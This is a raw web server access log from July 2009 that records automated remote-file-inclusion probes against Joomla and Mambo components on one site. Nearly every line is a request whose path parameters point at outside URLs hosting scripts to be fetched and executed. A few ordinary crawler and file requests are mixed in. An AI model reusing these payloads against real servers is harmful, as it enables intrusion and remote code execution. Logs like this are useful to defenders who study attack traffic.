72.32.69.162 - - [26/Jul/2009:13:54:19 -0700] "GET /logs/access_080808.log//index.php?seccion=http://tor-zum-glueck.net//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:54:45 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:00 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:02 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:18 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:18 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:19 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:23 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:26 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:26 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:31 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:31 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:55:35 -0700] "GET /logs/access_090424.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:37 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:39 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:55:40 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.113.10 - - [26/Jul/2009:13:55:40 -0700] "GET /logs/access_090121.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://paulowtf.webs.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:55:41 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:55:50 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:55:53 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:55:54 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:56:01 -0700] "GET /logs/access_090408.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:56:03 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:56:07 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:56:10 -0700] "GET /logs/access_090415.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:19 -0700] "GET /logs/access_090407.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:19 -0700] "GET /logs/access_090509.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:57:30 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:57:30 -0700] "GET /logs/access_081009.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:32 -0700] "GET /logs/access_090411.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:13:57:35 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:35 -0700] "GET /logs/access_090509.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:35 -0700] "GET /logs/access_090407.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:40 -0700] "GET /logs/access_090509.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:40 -0700] "GET /logs/access_090407.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:41 -0700] "GET /logs/access_090407.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:41 -0700] "GET /logs/access_090509.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:45 -0700] "GET /logs/access_090412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:45 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:57:46 -0700] "GET /logs/access_090119.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:48 -0700] "GET /logs/access_090411.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:57:49 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 21084 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:53 -0700] "GET /logs/access_090411.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:57:54 -0700] "GET /logs/access_090411.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:07 -0700] "GET /logs/access_090412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:07 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:07 -0700] "GET /logs/access_090412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:08 -0700] "GET /logs/access_090412.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:08 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:11 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:19 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:29 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:33 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:38 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:42 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:58:54 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:58:58 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:13:59:01 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:59:02 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:13:59:16 -0700] "GET /logs/access_080524.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:13:59:23 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:13:59:35 -0700] "GET /logs/access_081009.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:13:59:35 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:13:59:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:13:59:54 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 21089 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:13:59:54 -0700] "GET /logs/access_081009.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:13:59:54 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:13:59:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:13:59:56 -0700] "GET /logs/access_090119.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:14:00:12 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 21084 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:14:00:14 -0700] "GET /logs/access_090119.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:00:31 -0700] "GET /logs/access_080929.log/errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:00:31 -0700] "GET /logs/errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:00:31 -0700] "GET /errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:14:00:35 -0700] "GET /logs/access_090502.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.8.0.47 - - [26/Jul/2009:14:00:41 -0700] "GET /logs/access_090415.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:01:07 -0700] "GET /logs/access_081028.log/errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:14:01:30 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
115.88.240.91 - - [26/Jul/2009:14:01:35 -0700] "GET /logs/access_090119.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:14:02:07 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.99.196.136 - - [26/Jul/2009:14:02:12 -0700] "GET /logs/access_090119.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:14:03:03 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:14:03:03 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:14:03:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.145.31.242 - - [26/Jul/2009:14:03:18 -0700] "GET /logs/access_080524.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:14:03:18 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 200 21075 "-" "Mozilla/5.0" "www.dmulk.com"
125.248.88.155 - - [26/Jul/2009:14:03:19 -0700] "GET /logs/access_090119.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:32 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:32 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:32 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:34 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:34 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:34 -0700] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:41 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:03:41 -0700] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.114.237 - - [26/Jul/2009:14:03:51 -0700] "GET /logs/access_080502.log/index.php?sayfa=http://mspecgroup.com/~sales/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.114.237 - - [26/Jul/2009:14:03:51 -0700] "GET /logs/access_090627.log/index.php?sayfa=http://mspecgroup.com/~sales/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.77.114.237 - - [26/Jul/2009:14:03:51 -0700] "GET /logs/index.php?sayfa=http://mspecgroup.com/~sales/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:14:03:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
89.97.206.137 - - [26/Jul/2009:14:03:53 -0700] "GET /logs/errors.php?error=http://www.nopaste.pl/Source/e1e.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
89.97.206.137 - - [26/Jul/2009:14:03:53 -0700] "GET /errors.php?error=http://www.nopaste.pl/Source/e1e.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
164.77.114.237 - - [26/Jul/2009:14:04:07 -0700] "GET /index.php?sayfa=http://mspecgroup.com/~sales/fx29id1.txt?? HTTP/1.1" 200 20999 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:14:04:33 -0700] "GET /logs/access_081009.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:04:35 -0700] "GET /logs/access_080929.log/errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:04:35 -0700] "GET /errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:14:04:36 -0700] "GET /logs/errors.php?error=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.146.100 - - [26/Jul/2009:14:04:38 -0700] "GET /logs/access_090119.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
